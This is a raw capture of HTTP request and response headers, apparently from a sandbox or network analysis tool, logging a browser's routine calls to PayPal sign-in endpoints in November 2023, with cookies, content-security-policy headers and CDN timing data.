set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:28 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:32 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAzMjgzMyIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:32 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685032%26vteXpYrS%3D1698988832%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:32 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:32 GMT; Secure
traceparent: 00-0000000000000000000f9115647227c7-d5f9703eb31601ac-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:32 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230075-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987033.693328,VS0,VE228
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f9115647227c7-81d894b9ffd7b415-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/signin/client-log

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /signin/client-log HTTP/2.0
host: www.paypal.com
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json
accept-encoding: gzip, deflate, br
content-length: 1207
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=unifiedloginnodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAyMjI0NSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685022%26vteXpYrS%3D1698988822%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-efRO83uVa3lrHDKu8RuN5ujOVcriASIqWgqJ6hYEq0AD5BJO' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"10562-vXqTOj3P3LeKFxtSIsxCz/gmMzc"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f9115648f0d9a
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:28 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:32 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAzMjgzOCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:32 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685032%26vteXpYrS%3D1698988832%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:32 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:32 GMT; Secure
traceparent: 00-0000000000000000000f9115648f0d9a-c6a0069cc0f03a61-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:32 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230064-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987033.693506,VS0,VE235
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f9115648f0d9a-e96c5bc087f7d2a2-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
GET

https://www.paypal.com/signin/cookie-banner?

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

GET /signin/cookie-banner? HTTP/2.0
host: www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
accept: application/json
accept-encoding: gzip, deflate, br
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=unifiedloginnodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAyMjI0NSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685022%26vteXpYrS%3D1698988822%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
access-control-expose-headers: Server-Timing
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; script-src 'nonce-Yq8b5H8pLdliWLAFy/j4ZRhhNzgAkGpdZLpeeQWeCBSg1kcv' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn 'unsafe-inline'; img-src 'self' https://*.googleusercontent.com/ https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://ak1s.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com https://ak1.abmr.net data:; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://192.55.233.1 'unsafe-inline' https://*.qualtrics.com; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://smartlock.google.com https://*.qualtrics.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"51ea-fjg6rLBHag6rTAnWDvLmAO9Mda8"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f9115644ee077
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:32 GMT; Secure
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:28 GMT; HttpOnly; Secure
set-cookie: cookie_prefs=T%3D0%2CP%3D0%2CF%3D0%2Ctype%3Dinitial; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:32 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAzMjg1MiIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:32 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685032%26vteXpYrS%3D1698988832%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:32 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:32 GMT; Secure
traceparent: 00-0000000000000000000f9115644ee077-5d6dc061622d2e92-01
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:32 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230037-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987033.693014,VS0,VE247
vary: Accept-Encoding
server-timing: "traceparent;desc="00-0000000000000000000f9115644ee077-b71540da712b7087-01"";content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/signin/load-resource

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /signin/load-resource HTTP/2.0
host: www.paypal.com
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
x-requested-with: XMLHttpRequest
content-type: application/x-www-form-urlencoded
accept: application/json
accept-encoding: gzip, deflate, br
content-length: 150
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=unifiedloginnodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAyMjI0NSIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685022%26vteXpYrS%3D1698988822%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-nKwVYxI4ugT5mUUntKqfETsgPfPGGBMFBVa7nwP72kLXXxs9' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: text/plain; charset=utf-8
etag: W/"4c7a-nQnRsE5YjEBmM13rjlmUuv/QcJU"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f91156417ab80
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:29 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:33 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzAzMzAxNCIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: tsrce=authchallengenodeweb; Domain=.paypal.com; Path=/; Expires=Mon, 06 Nov 2023 04:50:33 GMT; HttpOnly; Secure; SameSite=None
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:33 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685032%26vteXpYrS%3D1698988832%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:33 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:33 GMT; Secure
traceparent: 00-0000000000000000000f91156417ab80-b685811d52f7ba5b-01
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: bytes
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
date: Fri, 03 Nov 2023 04:50:33 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230040-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987033.684622,VS0,VE419
vary: Accept-Encoding
server-timing: content-encoding;desc="gzip",x-cdn;desc="fastly"
POST

https://www.paypal.com/auth/verifychallenge

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /auth/verifychallenge HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/x-www-form-urlencoded
x-requested-with: XMLHttpRequest
accept-encoding: gzip, deflate, br
content-length: 282
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAzMjgzOCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685032%26vteXpYrS%3D1698988832%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; cookie_prefs=T%3D0%2CP%3D0%2CF%3D0%2Ctype%3Dinitial; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-sCfaF7jspaW2JkJYXSoiHWCPTC5Iy8xJwbsy0TLaWXuNlYtb' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: text/plain; charset=utf-8
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
origin-trial: AlIogV3KFtnbfVCyl9Z2NprE7FD8PYCt+TQiYdE3ppeJjJ0xJKcthYwOxXpRCNopxVWdOIENMcNSvQCGAmj0fw0AAAB2eyJvcmlnaW4iOiJodHRwczovL3BheXBhbC5jb206NDQzIiwiZmVhdHVyZSI6IlNlbmRGdWxsVXNlckFnZW50QWZ0ZXJSZWR1Y3Rpb24iLCJleHBpcnkiOjE2ODQ4ODYzOTksImlzU3ViZG9tYWluIjp0cnVlfQ==
paypal-debug-id: f939071dc676d
permissions-policy: ch-ua-platform-version=(self "https://c.paypal.com"),ch-ua-arch=(self "https://c.paypal.com"),ch-ua-wow64=(self "https://c.paypal.com"),ch-ua-model=(self "https://c.paypal.com"),ch-ua-bitness=(self "https://c.paypal.com"),ch-ua-full-version=(self "https://c.paypal.com"),ch-ua-full-version-list=(self "https://c.paypal.com")
set-cookie: LANG=en_US%3BUS; Max-Age=31556; Domain=.paypal.com; Path=/; Expires=Fri, 03 Nov 2023 13:36:42 GMT; HttpOnly; Secure
set-cookie: enforce_policy=ccpa; Max-Age=31536000; Domain=.paypal.com; Path=/; Expires=Sat, 02 Nov 2024 04:50:46 GMT; Secure
set-cookie: x-pp-s=eyJ0IjoiMTY5ODk4NzA0Njc3MyIsImwiOiIwIiwibSI6IjAifQ; Domain=.paypal.com; Path=/; HttpOnly; Secure
set-cookie: l7_az=dcg01.phx; Path=/; Domain=paypal.com; Expires=Fri, 03 Nov 2023 05:20:46 GMT; HttpOnly; Secure
set-cookie: ts=vreXpYrS%3D1793685046%26vteXpYrS%3D1698988846%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:46 GMT; HttpOnly; Secure
set-cookie: ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; Path=/; Domain=paypal.com; Expires=Mon, 02 Nov 2026 04:50:46 GMT; Secure
traceparent: 00-0000000000000000000f939071dc676d-2b4989f04d0e2357-01
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
dc: ccg11-origin-www-1.paypal.com
accept-ranges: none
via: 1.1 varnish, 1.1 varnish, 1.1 varnish
content-encoding: br
date: Fri, 03 Nov 2023 04:50:46 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
x-served-by: cache-fra-eddf8230130-FRA, cache-ams21050-AMS, cache-ams21050-AMS
x-cache: MISS, MISS, MISS
x-cache-hits: 0, 0, 0
x-timer: S1698987047.660519,VS0,VE198
vary: Accept-Encoding
server-timing: content-encoding;desc="br",x-cdn;desc="fastly"
POST

https://www.paypal.com/auth/logclientdata

MicrosoftEdgeCP.exe

Remote address:

151.101.1.21:443

Request

POST /auth/logclientdata HTTP/2.0
host: www.paypal.com
accept: */*
origin: https://www.paypal.com
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: application/json;charset=UTF-8
x-requested-with: XMLHttpRequest
accept-encoding: gzip, deflate, br
content-length: 249
cache-control: no-cache
cookie: enforce_policy=ccpa; cookie_check=yes; d_id=061e865499cf40f9a445927eb8fa27a31698986991586; LANG=en_US%3BUS; tsrce=authchallengenodeweb; x-pp-s=eyJ0IjoiMTY5ODk4NzAzMjgzOCIsImwiOiIwIiwibSI6IjAifQ; l7_az=dcg01.phx; ts=vreXpYrS%3D1793685032%26vteXpYrS%3D1698988832%26vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb%26vtyp%3Dnew; ts_c=vr%3D93841fb618b0a55288a662fbffc62aec%26vt%3D93841fb618b0a55288a662fbffc62aeb; cookie_prefs=T%3D0%2CP%3D0%2CF%3D0%2Ctype%3Dinitial; nsid=s%3AzqAefkJ95wQdM_ODID6COy9-CN8N11wp.vup2cuNd7Nq9TiaoHsdY8DU%2FLFieL1EA95TIy0Pn%2FTg

Response

HTTP/2.0 200

accept-ch: sec-ch-ua-full, sec-ch-ua-arch, sec-ch-ua-model, sec-ch-ua-platform-version, sec-ch-ua-full-version, sec-ch-ua-full-version-list, sec-ch-ua-bitness, sec-ch-ua-wow64
cache-control: max-age=0, no-cache, no-store, must-revalidate
content-encoding: gzip
content-security-policy: default-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; script-src 'nonce-uj06QJMJmkGrYJ+1tULe9nHNRmNF7mV//lKX889pQeh0fsgL' 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.recaptcha.net https://www.gstatic.com https://hcaptcha.com https://*.hcaptcha.com 'unsafe-inline'; img-src https://*.paypalobjects.com https://objects.paypal.cn https://*.paypal.com https://*.paypal.cn https://ak1s.abmr.net https://ak1.abmr.net https://ak1s.mathtag.com https://akamai.mathtag.com; object-src 'none'; media-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; font-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn; frame-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://www.google.com https://www.recaptcha.net https://paypal-api.arkoselabs.com https://paypal-api.arkose.com.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; style-src 'self' 'unsafe-inline' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com; form-action 'self' https://*.paypal.com https://*.paypal.cn https://*.zettle.com https://*.xoom.com; base-uri 'self' https://*.paypal.com https://*.paypal.cn; connect-src 'self' https://*.paypal.com https://*.paypal.cn https://*.paypalobjects.com https://objects.paypal.cn https://hcaptcha.com https://*.hcaptcha.com https://*.qualtrics.com; upgrade-insecure-requests;; report-uri https://www.paypal.com/csplog/api/log/csp
content-type: application/json; charset=utf-8
etag: W/"792-MC2I/PViCfAsYgxIRhQdU78MijA"
